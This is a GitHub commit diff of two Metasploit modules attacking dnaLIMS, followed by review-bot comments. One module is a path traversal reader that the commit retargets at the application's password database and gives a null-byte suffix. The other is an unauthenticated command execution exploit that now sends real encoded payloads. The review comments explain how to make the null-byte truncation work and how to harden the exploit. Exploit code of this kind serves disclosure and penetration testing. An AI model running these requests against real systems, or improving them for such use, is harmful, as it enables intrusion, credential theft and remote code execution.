Merge pull request #3 from h00die/flakeydna

dnalims
bug/bundler_fix
Flaky Biscuits 2017-03-20 10:59:52 -04:00 committed by GitHub
commit a7671397ba
2 changed files with 15 additions and 21 deletions


@ -1,5 +1,3 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -7,8 +5,7 @@
require 'msf/core' require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
@ -24,14 +21,14 @@ class MetasploitModule < Msf::Exploit::Remote
}, },
'References' => 'References' =>
[ [
['CVE', '2017-6527'] ['CVE', '2017-6527'],
['US-CERT-VU', '929263'] ['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
], ],
'Author' => 'Author' =>
[ [
'h00die', # Discovery, PoC 'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC 'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DisclosureDate' => "Mar 8 2017" 'DisclosureDate' => "Mar 8 2017"
@ -40,8 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']), OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
OptString.new('FILE', [ true, "The path to the file to view", '/etc/passwd']), OptString.new('FILE', [ true, "The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
OptInt.new('DEPTH', [true, 'The max traversal depth', 11]) OptInt.new('DEPTH', [true, 'The traversal depth', 4])
], self.class) ], self.class)
deregister_options('RHOST') deregister_options('RHOST')
@ -57,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Requesting: #{file} - #{rhost}") print_status("Requesting: #{file} - #{rhost}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{base}/viewAppletFsa.cgi", 'uri' => "#{base}/viewAppletFsa.cgi",
'vars_get' => { 'secID' => "#{traverse}#{file}", 'vars_get' => { 'secID' => "#{traverse}#{file}%00",
'Action' => 'blast', 'Action' => 'blast',
'hidenav' => '1' 'hidenav' => '1'
} }
@ -68,14 +65,13 @@ class MetasploitModule < Msf::Exploit::Remote
return return
end end
if res.code != 200 if res.code != 200
print_error("Server returned a non-200 response (body will not be saved):") print_error("Server returned a non-200 response (body will not be saved):")
print_line(res.to_s) print_line(res.to_s)
return return
end end
vprint_line(res.body) vprint_good(res.body)
p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file)) p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
print_good("File saved as: #{p}") print_good("File saved as: #{p}")
end end
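Review bot: The null byte appended to `secID` on the new side of the request hunk is the literal three characters `%00`; if `send_request_cgi` URL-encodes `vars_get` values, as Rex does by default, the target receives `%2500` and the intended truncation of whatever suffix the CGI appends never happens. Send a real NUL and let the encoder emit `%00` on the wire, `'secID' => "#{traverse}#{file}\x00",`, or keep the literal and add `'encode_params' => false` to the request; which is right depends on what the CGI decodes, which the commit does not record. It would also help to say in the option description why DEPTH dropped from 11 to 4 together with the NUL, since the two changes read as tuned against one specific install. The method that builds this request starts before the hunk.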


@ -1,5 +1,3 @@
## ##
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
@ -18,18 +16,18 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{ 'Description' => %q{
This module utilizes an administrative module which allows for This module utilizes an administrative module which allows for
command execution. This page is completely unprotected from any command execution. This page is completely unprotected from any
authentication when given a POST command. authentication when given a POST request.
}, },
'Author' => 'Author' =>
[ [
'h00die <mike@stcyrsecurity.com>', # Discovery, PoC 'h00die <mike@shorebreaksecurity.com>', # Discovery, PoC
'flakey_biscuit' # Discovery, PoC 'flakey_biscuit <nicholas@shorebreaksecurity.com>' # Discovery, PoC
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['CVE', '2017-6526'] ['CVE', '2017-6526'],
['US-CERT-VU', '929263'] ['US-CERT-VU', '929263'],
['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/'] ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
], ],
'Platform' => %w( linux unix ), 'Platform' => %w( linux unix ),
@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
'username' => '', 'username' => '',
'navUserName' => '', 'navUserName' => '',
'Action' => 'executeCmd', 'Action' => 'executeCmd',
'executeCmdData' => 'ls', 'executeCmdData' => payload.encoded,
} }
) )
vprint_good(res.body) vprint_good(res.body)
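Review bot: `vprint_good(res.body)` after the new `'executeCmdData' => payload.encoded` line reports success without checking that `res` exists or that the command ran; the call that assigns `res` is outside the hunk, and if it is `send_request_cgi` it can return nil on a connection failure, so this line would raise NoMethodError instead of failing cleanly. Add `fail_with(Failure::Unreachable, 'No response from the target') unless res` before it and demote the echo to `vprint_status(res.body)`, since the body is only the CGI's output and says nothing about whether a session came back. The enclosing exploit method starts before this hunk.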